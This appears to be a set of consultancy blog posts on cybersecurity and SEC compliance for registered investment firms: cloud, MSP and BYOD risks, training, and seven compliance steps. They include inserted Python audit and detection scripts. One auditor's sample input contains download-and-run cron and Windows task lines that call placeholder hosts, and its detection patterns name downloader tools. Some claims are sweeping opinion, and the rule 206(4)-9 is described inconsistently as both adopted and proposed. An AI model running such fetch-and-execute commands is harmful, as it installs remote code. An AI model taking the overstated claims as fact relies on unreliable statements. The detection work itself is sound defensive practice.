ThreatWire

The Pros and (Mostly) Cons of RIAs Moving to the Cloud


The “cloud” has revolutionized computing as we know it, providing SEC registered financial institutions with the ability to quickly deploy an online presence, to scale as demand ebbs and flows, and to build the foundation for a remote workforce.

However, this convenience comes with its own set of challenges, and the race to “move to the cloud” has frequently left registered firms and their clients with an entirely new set of security challenges, data-privacy issues, and a significant regulatory compliance workload that they aren’t prepared to face. In this article, we will explore the pros and cons of moving to the cloud as an RIA.

These issues will be even more pronounced with the introduction of the SEC’s new cybersecurity regulation, 206(4)-9.

The Pros of Moving to the Cloud

There are many reasons why RIAs choose to move to the cloud. Perhaps the most appealing reason is the convenience factor. With the cloud, organizations can quickly deploy an online presence without having to invest in on-premises infrastructure. Additionally, the cloud provides organizations with the ability to scale as demand ebbs and flows. For example, during a pandemic when many employees are working remotely, a company may need to increase its cloud capacity to accommodate the influx of traffic.

Another advantage of moving to the cloud is that it can help organizations save money. With on-premises infrastructure, companies have to pay for hardware, software, maintenance, and energy costs. However, with cloud computing, these costs are often included in the monthly service fee. Additionally, because cloud providers frequently offer pay-as-you-go pricing models, companies only have to pay for the resources they use – making it a more cost-effective option in the long run.

The Cons of Moving to the Cloud

However, there are also some disadvantages of moving to the cloud that financial institutions need to be aware of before making the switch. One of the biggest lies ever told is that the cloud provides security. It doesn’t. When data is stored off-site on servers that are managed by a third-party provider, there is always a risk that sensitive information could be compromised. And cloud compromises happen frequently. Additionally, because cloud environments are often complex and dynamic (with multiple users accessing data from different locations), it can be difficult for IT teams to monitor for potential security threats. These cloud providers usually don’t bother checking for breaches/compromises proactively and in many cases, they won’t even tell their customers about notifications of these problems from external researchers.

What problems do I find most frequently when performing security audits for clients?

I have found countless VM images with unpatched vulnerabilities and some that contain malware or coin miners. Furthermore, cloud marketplaces are replete with pre-built VMs for customers to use, and while this is a convenient method, it often opens the door for an attack. These images can be outdated or have overly permissive firewall settings which make them an easy target. Another problem has been the introduction of VM images that come pre-installed with malware or crypto-currency miners.

While these attacks are threatening, they’re only the beginning in terms of what’s possible. An attacker that is properly motivated could create a VM image that would contact the malware operators and establish a command-and-control connection after a set amount of time has passed.

Furthermore, with the rise in hybrid-cloud deployments and point-to-point VPNs connecting cloud environments to a customer’s on-premises network, a vulnerability on a cloud VM could easily become a pathway to the heart of an organization’s network.

While cloud providers do scan VM images for malware before allowing them to be used, these scans only detect KNOWN and UNALTERED malicious code. This is not a complete defense against all threats and doesn’t protect from real-world threats. For example, a simple cron job on a Linux VM or scheduled task in Windows could easily download secondary payloads days or weeks after provisioning and never be detected.

Not only this, but cloud providers such as AWS often allow any user to share a VM image in the marketplace. Similar to the risk mobile app stores pose, using these types of VMs can have dangerous enterprise consequences.
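The point above about a cron job or scheduled task fetching a payload long after the provider's malware scan has passed is something you can check for yourself before an image goes into production. The following is an added example (not code from the original post, and not a tool from any cloud provider): a Python pre-deployment review that extracts the scheduled jobs from an image and flags the traits of a deferred fetch-and-run job: download utilities, remote URLs, output piped into an interpreter, encoded or hidden-window PowerShell, and execution out of temporary directories. The crontab lines and the task list are constructed sample input; on a real image you would feed it the output of `crontab -l` (and the contents of /etc/cron.d) from the mounted disk and an export of the Windows task library.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample input (illustrative, not taken from any real image):
# a Linux crontab as printed by `crontab -l`, and a simplified
# (task name, command) export of Windows scheduled tasks.
CRONTAB_LINES = [
    "# m h dom mon dow command",
    "PATH=/usr/local/bin:/usr/bin:/bin",
    "0 3 * * * /usr/bin/apt-get update -q",
    "*/15 * * * * /opt/agent/bin/heartbeat --quiet",
    "30 4 */7 * * curl -s http://update.example.invalid/p.sh | sh",
    "@reboot /usr/local/bin/backup.sh",
]
SCHEDULED_TASKS = [
    ("\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "%windir%\\system32\\defrag.exe -c"),
    ("\\Updater", "powershell.exe -w hidden -EncodedCommand <base64 omitted>"),
    ("\\Cleanup", "cmd.exe /c certutil -urlcache -split -f http://cdn.example.invalid/a.exe "
                  "C:\\Temp\\a.exe && C:\\Temp\\a.exe"),
]

# Traits that are not malicious on their own but, in a job baked into a
# marketplace image, deserve a human look before the image is deployed.
INDICATORS = {
    "downloader": re.compile(r"\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest|iwr|DownloadString|DownloadFile)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "pipe_to_interpreter": re.compile(r"\|\s*(sh|bash|zsh|python[23]?|perl)\b"),
    "encoded_command": re.compile(r"-(enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "base64_decode": re.compile(r"base64\s+(-d|--decode)\b"),
    "temp_exec": re.compile(r"(^|[\s&|;])(/tmp/|/dev/shm/|%TEMP%|C:\\Temp\\|\\AppData\\)", re.I),
}


def parse_crontab(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (schedule, command) pairs, skipping comments, blanks and VAR=value lines."""
    entries = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):              # @reboot, @daily, ... take one field
            parts = line.split(None, 1)
        else:                                 # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            parts = [" ".join(parts[:5]), parts[5]]
        if len(parts) == 2:
            entries.append((parts[0], parts[1]))
    return entries


def audit_command(command: str) -> List[str]:
    """Sorted names of every indicator present in one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(command))


@dataclass
class Finding:
    source: str          # "cron" or "task"
    where: str           # cron schedule or Windows task name
    command: str
    indicators: List[str]


def audit_image(cron_lines: List[str], tasks: List[Tuple[str, str]]) -> List[Finding]:
    """Every scheduled job in the image that shows at least one indicator."""
    findings = []
    for schedule, cmd in parse_crontab(cron_lines):
        hits = audit_command(cmd)
        if hits:
            findings.append(Finding("cron", schedule, cmd, hits))
    for name, cmd in tasks:
        hits = audit_command(cmd)
        if hits:
            findings.append(Finding("task", name, cmd, hits))
    return findings


if __name__ == "__main__":
    for f in audit_image(CRONTAB_LINES, SCHEDULED_TASKS):
        print(f"[{f.source}] {f.where}: {', '.join(f.indicators)}\n    {f.command}")
```

On the sample input the apt update, the agent heartbeat, the reboot backup and the defrag task pass clean, while the weekly `curl | sh` job, the hidden encoded PowerShell task and the certutil-to-Temp task are each reported with the indicators that tripped. Treat a hit as a reason to open the image and read the job, not as a verdict: legitimate provisioning scripts also download things, which is exactly why a signature scan at upload time is not enough.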

Client privacy issues are a huge concern when moving to the cloud. Because data is stored off-site on servers that are managed by a third-party provider, there is always a risk that sensitive information could be accessed by unauthorized individuals. Cloud deployments are a frequent source of data leaks (S3 buckets, open databases, SQL servers) for otherwise secure organizations.

Given that security is of utmost importance for the companies sustaining major clouds, such as Azure, AWS, Google Cloud Platform (GCP), etc., said companies have implemented extremely well-developed processes to secure their hypervisor layers. However, because these organizations provide infrastructure/platform/software solutions a majority of the work falls on the customer’s shoulders to secure their particular environment.

Lastly, most cloud providers collect broad swaths of user data (e.g., usage statistics and personal information) for either marketing efforts or third-party sales without users’ prior consent. This should cause anyone to pause about how our (and our client’s) sensitive information is being used and by whom, especially when it’s stored off-site on servers we don’t have control over.

Although cloud networking is not automatically insecure, organizations should understand that their security strategy for the cloud needs to be as strong as for an on-premises environment. With the world moving towards a remote workforce operating in a hybrid or cloud-centric environment, these companies cannot assume that added security comes along when you are working with Seattle, Redmond or Bay Area tech giants.

There are both advantages and disadvantages to moving to the cloud, which organizations should weigh carefully before making a decision. Some benefits of moving to the cloud include convenience and cost savings, while some risks include data security threats associated with storing data off-site on servers managed by a third party.

If you do decide to go to the cloud, make sure you are comparing your configuration settings against a known benchmark, such as the CIS AWS Foundations Security Benchmark.
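To make the benchmark comparison concrete, here is an added example (not code from the original post, and not a CIS or MTradecraft tool) of the shape such a check takes: a snapshot of account settings is evaluated against a list of rules, each with a pass/fail test and a remediation note, and the failures become the audit finding. The rule ids and wording here are illustrative approximations of the kinds of controls the CIS AWS Foundations Benchmark covers (root MFA, multi-region CloudTrail, password policy, S3 Block Public Access, open administrative ports); they are not the benchmark's own numbering or text. The snapshot is constructed; in practice you would fill the same structure from the provider's APIs.

```python
from copy import deepcopy
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed snapshot of one cloud account's settings, in the shape an audit
# script would assemble from the provider's APIs. Values are illustrative.
ACCOUNT_SNAPSHOT = {
    "root_mfa_enabled": False,
    "cloudtrail_trails": [{"name": "main", "multi_region": False, "log_validation": True}],
    "password_policy": {"min_length": 8, "require_symbols": False},
    "s3_public_access_block": {
        "BlockPublicAcls": True, "BlockPublicPolicy": True,
        "IgnorePublicAcls": True, "RestrictPublicBuckets": False,
    },
    "security_groups": [
        {"id": "sg-web", "ingress": [{"port": 443, "cidr": "0.0.0.0/0"}]},
        {"id": "sg-admin", "ingress": [{"port": 22, "cidr": "0.0.0.0/0"},
                                       {"port": 3389, "cidr": "10.0.0.0/8"}]},
    ],
}


@dataclass
class Rule:
    id: str                          # local id for this script, NOT a CIS benchmark number
    title: str
    check: Callable[[dict], bool]    # True when the snapshot satisfies the rule
    remediation: str


def no_admin_ports_open_to_world(snap: dict) -> bool:
    for sg in snap["security_groups"]:
        for rule in sg["ingress"]:
            if rule["port"] in (22, 3389) and rule["cidr"] in ("0.0.0.0/0", "::/0"):
                return False
    return True


RULES: List[Rule] = [
    Rule("B-1", "MFA is enabled for the root account",
         lambda s: s["root_mfa_enabled"], "Enroll a hardware MFA device on the root user."),
    Rule("B-2", "At least one CloudTrail trail is multi-region",
         lambda s: any(t["multi_region"] for t in s["cloudtrail_trails"]), "Enable a multi-region trail."),
    Rule("B-3", "Every CloudTrail trail has log file validation enabled",
         lambda s: all(t["log_validation"] for t in s["cloudtrail_trails"]), "Turn on log file validation."),
    Rule("B-4", "IAM password policy requires at least 14 characters",
         lambda s: s["password_policy"]["min_length"] >= 14, "Raise the minimum password length."),
    Rule("B-5", "Account-level S3 Block Public Access is fully enabled",
         lambda s: all(s["s3_public_access_block"].values()), "Enable all four Block Public Access settings."),
    Rule("B-6", "No security group allows SSH or RDP from the whole internet",
         no_admin_ports_open_to_world, "Restrict ports 22 and 3389 to known admin ranges."),
]


def evaluate(snapshot: dict, rules: List[Rule] = RULES) -> Dict[str, bool]:
    """Map every rule id to pass/fail. Missing data is a failure, never a silent pass."""
    results = {}
    for r in rules:
        try:
            results[r.id] = bool(r.check(snapshot))
        except (KeyError, TypeError):
            results[r.id] = False
    return results


def failed_rule_ids(snapshot: dict, rules: List[Rule] = RULES) -> List[str]:
    return [rid for rid, ok in evaluate(snapshot, rules).items() if not ok]


def report(snapshot: dict, rules: List[Rule] = RULES) -> str:
    """Human-readable audit output: one line per rule, plus the fix for each failure."""
    results = evaluate(snapshot, rules)
    lines = []
    for r in rules:
        lines.append(f"{'PASS' if results[r.id] else 'FAIL'} {r.id} {r.title}")
        if not results[r.id]:
            lines.append(f"       fix: {r.remediation}")
    return "\n".join(lines)


def hardened(snapshot: dict) -> dict:
    """The same account after every remediation above is applied (for comparison)."""
    s = deepcopy(snapshot)
    s["root_mfa_enabled"] = True
    for t in s["cloudtrail_trails"]:
        t["multi_region"] = True
    s["password_policy"]["min_length"] = 14
    s["s3_public_access_block"]["RestrictPublicBuckets"] = True
    for sg in s["security_groups"]:
        for rule in sg["ingress"]:
            if rule["port"] in (22, 3389):
                rule["cidr"] = "10.0.0.0/8"
    return s


if __name__ == "__main__":
    print(report(ACCOUNT_SNAPSHOT))
    print("\nAfter remediation, failing rules:", failed_rule_ids(hardened(ACCOUNT_SNAPSHOT)))
```

The design choice worth copying is in `evaluate`: a rule whose data cannot be read fails rather than passes, so an API call the script forgot to make (or was not permitted to make) shows up in the report instead of hiding as a green check. Keep the report output; during an examination it is the evidence that you compared your configuration against the benchmark, not just that you meant to.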

Need help auditing your cloud environments? MTradecraft can help. We are not affiliated with any cloud services which allows us to act as a true consultant to our clients.

The Dangers of MSPs for SEC and FINRA Registered Firms

The Dangers of Managed IT Service Providers (MSPs) for SEC-registered Firms.

(And Knowing When to RUN away from them)

There is a conflict of interest between every MSP and their clients which makes MSPs an insider threat to every SEC or FINRA registered firm’s processes and systems. They have unrestricted access to a client’s network and systems, which gives them the ability to do serious damage if they are not properly supervised.

In this blog post, I will explore the dangers of MSPs, how to audit their work, and how to protect your firm from them. While I am not saying every MSP is like this, I will say that the vast majority I have encountered within my 200+ cyber audits are.

So what is the big problem?

The goals of the MSP and their clients never align.

In the cybersecurity world, there is a very real balance between “security” and “convenience”. The more secure a system is, the less convenient its usage. And Vice-Versa.

The goal of every MSP is to deliver templated technology solutions (or a package of solutions) to as many clients as possible. The MSP is generally going to err on the side of convenience when deploying these packages because that decreases the MSP’s workload both in implementation and support. When they err on the side of convenience they neglect security and leave vulnerabilities open across the client’s network.

The goal of the client (the SEC or FINRA registered firm) is security, and having the MSP provide that security is often in direct conflict with the MSP’s ability to conveniently deliver their solutions.

Thus, their goals in the service never align.

Here are some of the problems I think need to be discussed in the industry right now as the SEC continues to roll out the new cybersecurity regulations known as 206(4)-9.

To start, every firm should understand that solutions also come with problems. While hiring an MSP may help your IT department’s workload, it adds significant complexity to the Compliance department’s workload.

Here are the issues:

MSPs Have Unrestricted Access to Your Network and are frequent targets of attack:

MSPs have full access to your network and systems. This includes all of your data, applications, and devices. They also can make changes to your system configurations. This level of access makes MSPs a prime target for cyber criminals. If an MSP employee is compromised, the attacker can gain full access to your network and systems. This could allow them to steal sensitive data, install malicious software, or even shut down your entire network. Do you trust your MSP to report this breach to you? Don’t. They won’t. An MSP reporting a breach to you would cause reputation risk, revenue loss, as well as potential litigation.

MSP Employees Are Not Properly Supervised

MSP employees are not always properly supervised. This means that they may not be following proper security procedures when working on your network and systems. Additionally, MSP employees may not be properly trained in cybersecurity best practices. This could lead to them making mistakes that could put your firm at risk. For example, an MSP employee could accidentally delete critical files or fail to apply security patches in a timely manner.

How to Protect Your Firm from MSP Insider Threats

There are several steps that you can take to protect your firm from MSP insider threats:

1. Vet Your MSP: Be sure to thoroughly vet your MSP before giving them access to your network and systems. Make sure that they have a good reputation and that their employees are properly trained in cybersecurity best practices. Ask to see third-party audit reports. If they don’t have them this firm is not your friend. Your MSP should already have these reports and be proud to share these reports with you. If they aren’t, something is very wrong and the MSP is not working in your best interest.

2. Monitor Your Network: Be sure to self-monitor your network for any suspicious activity. This includes monitoring for unauthorized changes to system configurations and unusual patterns of data usage. During an examination, the SEC will want to see where you are verifying the MSPs security duties.

3. Restrict Access: Be sure only to give MSP employees the minimum amount of access necessary to perform their job duties. Do not give them any unnecessary privileges that could potentially be abused. When they request access to a system, ask the MSP to submit the request in writing to explain why they need access to those systems. Also ask the MSP to submit reports of which employees have access to your systems and what level of access they have. This all needs to be documented for the SEC and FINRA.

4. Educate Your Employees: Be sure to educate your employees about the dangers of working with unsecured networks and systems. Make sure that they know how to spot suspicious activity and what steps to take if they believe that their account has been compromised. If you have less than 11 employees, you can implement the FieldCraft cybersecurity awareness training program for free. [ https://www.fieldcraft.training ]

5. Implement Multi-Factor Authentication: Be sure the MSP implements multi-factor authentication for all user accounts, including accounts used by MSP employees. This will help reduce the risk of attackers gaining access to your network if an employee’s credentials are compromised. Oftentimes, MSPs do not use MFA because it adds to the time and complexity of their workload. Having MFA solves 99% of cybersecurity problems. If your MSP does not implement MFA by default….RUN.
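Steps 2, 3 and 5 above produce three artifacts that the SEC will expect you to be able to reconcile: the MSP’s written report of who has access and at what level, the firm’s own export of the accounts that actually exist, and the written access requests you approved. As an added example (not code from the original post, and not an MTradecraft product), here is a Python access review that cross-checks those three sources and writes up the discrepancies as findings: accounts the MSP did not report, roles that differ from what was reported, administrative rights with no approved request on file, accounts without MFA, and accounts that have not logged in within the review window. All three inputs are constructed; the field names are assumptions, and you would map your identity provider’s export onto them.

```python
from collections import Counter
from datetime import date
from typing import Dict, List, Tuple

# Constructed inputs (illustrative; no real firms, people or accounts):
# 1) the access report the MSP submitted in writing (step 3),
# 2) the firm's own export from its identity system (step 2),
# 3) the access requests the firm approved in writing, user -> approved role.
MSP_ACCESS_REPORT = [
    {"user": "a.chen@msp.example", "role": "admin", "mfa": True},
    {"user": "b.ortiz@msp.example", "role": "helpdesk", "mfa": True},
]
IDENTITY_EXPORT = [
    {"user": "a.chen@msp.example", "role": "admin", "mfa": True, "last_login": "2023-01-10"},
    {"user": "b.ortiz@msp.example", "role": "admin", "mfa": False, "last_login": "2023-01-12"},
    {"user": "svc-backup@msp.example", "role": "admin", "mfa": False, "last_login": "2022-06-01"},
]
APPROVED_REQUESTS = {
    "a.chen@msp.example": "admin",
    "b.ortiz@msp.example": "helpdesk",
}
REVIEW_DATE = "2023-02-01"   # the date the review is performed (constructed)

Finding = Tuple[str, str, str]   # (account, category, detail)


def review_access(msp_report: List[dict], identity_export: List[dict],
                  approved: Dict[str, str], today: str = REVIEW_DATE,
                  stale_days: int = 90) -> List[Finding]:
    """Reconcile what the MSP reported against what exists and what was approved."""
    review_day = date.fromisoformat(today)
    reported = {r["user"]: r for r in msp_report}
    existing = {a["user"] for a in identity_export}
    findings: List[Finding] = []

    for acct in identity_export:
        u = acct["user"]
        if u not in reported:
            findings.append((u, "unreported", "account exists but is missing from the MSP's access report"))
        elif reported[u]["role"] != acct["role"]:
            findings.append((u, "role_mismatch",
                             f"MSP reports '{reported[u]['role']}', system shows '{acct['role']}'"))
        if acct["role"] == "admin" and approved.get(u) != "admin":
            findings.append((u, "unapproved_privilege", "admin rights with no approved written request"))
        if not acct["mfa"]:
            findings.append((u, "no_mfa", "multi-factor authentication not enrolled"))
        idle = (review_day - date.fromisoformat(acct["last_login"])).days
        if idle > stale_days:
            findings.append((u, "stale", f"no login for {idle} days"))

    for u in reported:
        if u not in existing:
            findings.append((u, "ghost", "listed in the MSP's report but no such account exists"))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count of findings per category, for the cover page of the review."""
    return dict(Counter(cat for _, cat, _ in findings))


def evidence_text(findings: List[Finding], today: str = REVIEW_DATE) -> str:
    """The written record to keep on file for the SEC or FINRA."""
    lines = [f"MSP access review performed {today}: {len(findings)} finding(s)"]
    for user, cat, detail in findings:
        lines.append(f"  - {user}: {cat} ({detail})")
    return "\n".join(lines)


if __name__ == "__main__":
    results = review_access(MSP_ACCESS_REPORT, IDENTITY_EXPORT, APPROVED_REQUESTS)
    print(evidence_text(results))
    print(summarize(results))
```

On the constructed data the reviewed employee account comes back clean, the helpdesk account turns out to hold admin rights it was never approved for and has no MFA, and a service account the MSP never mentioned is an unused administrator. Those are exactly the discrepancies the written report is supposed to surface, and the `evidence_text` output, dated and filed, is the documentation the examination will ask for.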

By taking these steps, you can help protect your firm from the dangers of MSP insider threats.

In conclusion, many firms think hiring an MSP solves all their IT problems. While it does solve IT problems, it adds significant work to the Compliance department and to the CISO. It is important to be aware of the dangers of MSP insider threats and take steps to protect your firm from them.

By thoroughly vetting your MSP, monitoring your network, restricting employee access, educating your employees, and implementing multi-factor authentication, you can help reduce the risk of an attack on your firm.

Of course, if you need help with any of this work, MTradecraft would love to assist.

(To be clear, we don’t sell MSP services. We just do the audits.)

Why Cybersecurity Awareness Training is Important for SEC Registered Firms

Earlier this year, the SEC announced Rule 206(4)-9 as part of their sweeping overhaul of cybersecurity regulations. We are moving from a period where the SEC provided cybersecurity “guidance” to a period of cybersecurity “regulation”.

One of these proposed rules will require that firms must provide cybersecurity awareness training to their employees on an annual basis. Providing cybersecurity awareness training is the second most important cybersecurity tip we can offer. (Use 2FA on all accounts, is the first)

In order to understand why cybersecurity awareness training is so important, it’s first necessary to understand what cyberattacks are and how they work. A cyberattack is any type of attack that is carried out using electronic means. These attacks can take many different forms, but they all have one thing in common: they exploit vulnerabilities in order to gain access to sensitive information or systems.

The most common type of cyberattack is a phishing attack. Phishing attacks use emails or other communications that look legitimate in order to trick the recipient into giving up sensitive information, such as login credentials or financial information. Once the attacker has this information, they can use it to gain access to systems or steal money.

Another common type of attack is a malware attack.

Malware is short for malicious software, and it refers to any software that is designed to harm a computer system. Malware can be used to disable systems, delete files, run up toll charges, or even steal information. One of the most famous examples of malware is the WannaCry ransomware attack, which infected millions of computers around the world and caused billions of dollars in damage.

These are just two examples of the many different types of cyberattacks that exist. It’s important for businesses to be aware of all the different types of attacks that exist so that they can be better prepared to defend against them. This is where cybersecurity awareness training comes in.

MTradecraft provides this training to our clients through our FieldCraft platform. FieldCraft provides employees with the knowledge they need to identify and defend against common cyberattacks and tests their skills with real world simulations.

When employees are trained in cybersecurity best practices, they are better equipped to spot attacks when they occur and take steps to prevent them from happening in the first place. Cybersecurity awareness training can also help businesses create a culture of security within their organization, which can further reduce the risk of an attack occurring in the first place.

The SEC’s proposal for mandatory cybersecurity awareness training is a step in the right direction towards protecting registered firms from cyber threats. By teaching employees about common attacks and how to defend against them, firms can significantly reduce their risk of being breached. In addition, creating a culture of security within an organization can help further reduce the risk of an attack occurring in the first place. All SEC and FINRA registered firms should take this rule seriously and implement mandatory cybersecurity awareness training for their employees as soon as possible.

The U.S. Securities and Exchange Commission (SEC) announced charges against 18 individuals who used hacked brokerage accounts to trade stocks and launder money.

A few days ago, the SEC announced charges against 18 defendants in an international scheme to manipulate stocks using hacked US brokerage accounts.

In February of 2021, I hosted a webinar where we simulated a cyber attack on a hedge fund to show how hackers could potentially compromise brokerage accounts and make money in micro-caps by counter-trading the buy-orders stemming from the hacked accounts.

Below is a recording of that webinar if you are interested in understanding the mechanics of how this attack might have been conducted:

The SEC’s complaint alleges that hackers accessed at least 31 US retail brokerage accounts in late 2017 and early 2018, using them to purchase the securities of Lotus Bio-Technology Development Corp. and Good Gaming, Inc.

The illegal purchases allowed con-artists, who already had a lot of Lotus Bio-Tech and Good Gaming stock, to sell their inventory at higher than normal prices and make more than $1 million in illicit proceeds.

According to the complaint, Davies Wong of British Columbia, Canada, and Glenn B. Laken of Illinois controlled the majority of the Lotus Bio-Tech and Good Gaming stock that was sold, while Mohamed coordinated with Wong, Laken, and others to illegally carry out online attacks to artificially manipulate market prices. The complaint claims that Richard Tang of British Columbia, Canada, was a member of both the Lotus Bio-Tech and Good Gaming frauds.

7 Steps to Compliant and Effective SEC Cybersecurity Operations

The SEC has released new regulations on cybersecurity practices for registered firms. These regulations are collectively known as 206(4)-9. In this blog post, we’ll outline the seven steps your firm needs to take to strengthen its cybersecurity posture and meet the expectations of regulators.

  1. Establish a Board-Level Cybersecurity Oversight Function
    The first step is to establish a board-level cybersecurity oversight function. This doesn’t mean creating a new board committee devoted solely to cybersecurity (although that’s an option). Instead, it means assigning responsibility for cybersecurity governance to an existing board committee, such as the audit committee, and ensuring that the committee receives regular updates on the state of your company’s cybersecurity program.
  2. Conduct a Risk Assessment
    Your second step is to conduct a risk assessment to identify the specific cyber risks and threats facing your company. There are many different frameworks you can use for this purpose, but the SEC wants you to use the NIST Cybersecurity Framework because it’s well-recognized and widely used. Once you’ve identified your company’s specific risks, you can develop appropriate mitigation strategies.
  3. Develop a Cyber Incident Response Plan
    Your third step is to develop a cyber incident response plan. This should include both technical and non-technical components, and it should be regularly tested and updated. The plan should be tailored to your company’s specific risks and needs, but it should at least address communication protocols, data backup and recovery procedures, and employee training. Some firms include this as part of the firm’s overall BCP (Business Continuity Plan) while others draft a separate document to cover cyber related incidents.
  4. Implement Access Control Measures
    Your fourth step is to implement access control measures to restrict access to sensitive information on a need-to-know basis. This includes both physical and logical access controls, such as user authentication requirements (e.g., strong passwords) and least privilege principles (e.g., granting employees access only to the information they need to do their jobs).
  5. Implement Data Loss Prevention Measures
    Your fifth step is to implement data loss prevention (DLP) measures. DLP refers to any measure taken to prevent sensitive data from leaving your company’s network without authorization. This might include encrypting data in transit, implementing comprehensive activity logging, or deploying DLP software solutions.
  6. Train Employees on Cybersecurity Procedures
    Your sixth step is training employees on security procedures—including both technical procedures (e.g., how to spot phishing emails) and non-technical procedures (e.g., what to do if they suspect they’ve been breached). Employee training should be ongoing and should account for changes in threats over time.
  7. Monitor Your Network for Suspicious Activity
    Your seventh and final step is continuous monitoring of your network for suspicious activity using both automated tools (e.g., intrusion detection systems) and manual processes (e.g., periodic reviews of system logs and vulnerability scans). This will help you detect malicious activity quickly so you can take steps to contain any damage caused by a breach.
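Step 7 calls for periodic log review alongside automated tools. To show what a manual review can be reduced to, here is an added example (not code from the original post, and not an MTradecraft product) in Python that reads authentication log lines, keeps a sliding window of failed logins per source address, and raises an alert both when the failure count reaches a threshold and when a success follows a burst of failures from the same address. The log lines are constructed in the style of an SSH daemon’s auth log; the threshold and window are assumptions you would tune to your own environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List

# Constructed sample log lines (sshd-style auth log; not from any real system).
SAMPLE_LOG = """\
2023-03-01T09:00:01 sshd[2001]: Failed password for jdoe from 203.0.113.7 port 51022 ssh2
2023-03-01T09:00:03 sshd[2001]: Failed password for jdoe from 203.0.113.7 port 51023 ssh2
2023-03-01T09:00:05 sshd[2001]: Failed password for jdoe from 203.0.113.7 port 51024 ssh2
2023-03-01T09:00:07 sshd[2001]: Failed password for jdoe from 203.0.113.7 port 51025 ssh2
2023-03-01T09:00:09 sshd[2001]: Failed password for jdoe from 203.0.113.7 port 51026 ssh2
2023-03-01T09:00:12 sshd[2002]: Accepted password for jdoe from 203.0.113.7 port 51027 ssh2
2023-03-01T09:15:00 sshd[2003]: Accepted publickey for backup from 10.0.0.5 port 40000 ssh2
2023-03-01T09:20:00 sshd[2004]: Failed password for admin from 198.51.100.9 port 6000 ssh2
2023-03-01T09:40:00 sshd[2005]: Accepted password for admin from 198.51.100.9 port 6001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_log(text: str) -> List[dict]:
    """Turn matching lines into events; lines that are not login results are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.fromisoformat(e["ts"])
            events.append(e)
    return events


def detect(events: List[dict], threshold: int = 5, window_seconds: int = 300) -> List[Dict]:
    """Sliding-window review of failed logins per source address.

    Emits 'failed_attempts' once when an address reaches `threshold` failures inside
    the window, and 'success_after_failures' when a login from that address succeeds
    while `threshold` or more recent failures are still inside the window.
    """
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts = []
    for e in events:
        q = failures[e["ip"]]
        while q and (e["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()             # forget failures older than the window
        if e["result"] == "Failed":
            q.append(e["ts"])
            if len(q) == threshold:
                alerts.append({"kind": "failed_attempts", "user": e["user"], "ip": e["ip"],
                               "failures": len(q), "at": e["ts"].isoformat()})
        else:
            if len(q) >= threshold:
                alerts.append({"kind": "success_after_failures", "user": e["user"], "ip": e["ip"],
                               "failures": len(q), "at": e["ts"].isoformat()})
            q.clear()               # a success ends the burst either way
    return alerts


if __name__ == "__main__":
    for a in detect(parse_log(SAMPLE_LOG)):
        print(f"{a['at']} {a['kind']}: {a['user']} from {a['ip']} after {a['failures']} failure(s)")
```

On the sample, the five rapid failures from 203.0.113.7 produce one alert, and the successful password login twelve seconds later produces the second, more serious one. The single failure from 198.51.100.9 twenty minutes before its success never reaches the threshold, and because it falls outside the five-minute window it is not counted against the later success at all; widen `window_seconds` and it would be. A review like this is what turns “we keep logs” into the kind of monitoring an examiner can see working.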

Following these seven steps will help your firm achieve compliance with the SEC regulations on cybersecurity—and make your organization more secure in the process! If you need assistance implementing any of these steps, MTradecraft would be happy to help!

Webinar Recording: A Discussion on BYOD Policies at SEC Registered Firms.

In this webinar we discuss the dangers of Bring Your Own Device (BYOD) policies for SEC registered firms. BYOD policies can be a major security risk for firms as they open up the possibility for sensitive data to be accessed and stolen by malicious actors.

I’m not here to sell you a solution. There isn’t one. This is just the opinion of someone who has worn the CCO and COO hat for years, and now works as an ethical hacker having performed over 200 security audits and penetration tests against SEC registered firms.

Bring Your Own Device Policies are a Total Nightmare for SEC Registered Firms

Allowing employees to use their own personal devices for work is a stupid idea for all SEC registered firms.

I’m not here to sell you a solution. There isn’t one. This is just the opinion of someone who has worn the CCO and COO hat for years, and now works as an ethical hacker having performed over 200 security audits and penetration tests against SEC registered firms.

TLDR: Do not allow a BYOD policy at your firm.

The first thing I hear from CCO’s is “But our MSP (Managed Service Provider) has set up a MDM (Mobile Device Management) solution.”

My answer is always, “No, your MSP sold you on an MDM solution that doesn’t solve your compliance obligations.”

MDM software can help with most of the issues below, but I have yet to see one that is cut out to pull the compliance requirements of SEC-registered firms in a compliant way. For you legal nerds out there, we are looking at Advisers Act Rule 204-2 (Books and Records Rule) and 206(4)-7 (Compliance Rule) in terms of maintaining compliant communications records. 206(4)-9 will also touch on this when it hits the books April 2023.

If your SEC-registered firm decides to allow employees to use their personal mobile devices for work purposes, you should be aware of the following risks:

1. Data theft

If you allow your personnel to use their own devices unchecked, it is likely that some of the personal programs they use will not be held to the same security standards. An account they have for personal usage may eventually lead to corporate data and sensitive information being revealed if it is hacked.

2. Malware

Employees use personal devices to download various types of information and files, such as PDF, applications, and um….Porn. Corporate data security is at risk if employees aren’t able to discern between work-related and personal data. Games and porn downloaded or viewed with mobile devices are often associated with hidden viruses or malware, for example. If an employee logs into the company network from their infected device, the entire system could be jeopardized by passing along the malware to work systems.

3. Legal problems

A business’s reputation may be destroyed in the event of a security breach. If an employee-owned device results in a leak or breach of corporate data, this might result in serious consequences, such as potential litigation.

Working with legal counsel to develop sound policies is crucial for protecting your organization from costly and potentially devastating lawsuits, especially if you decide to allow a BYOD policy.

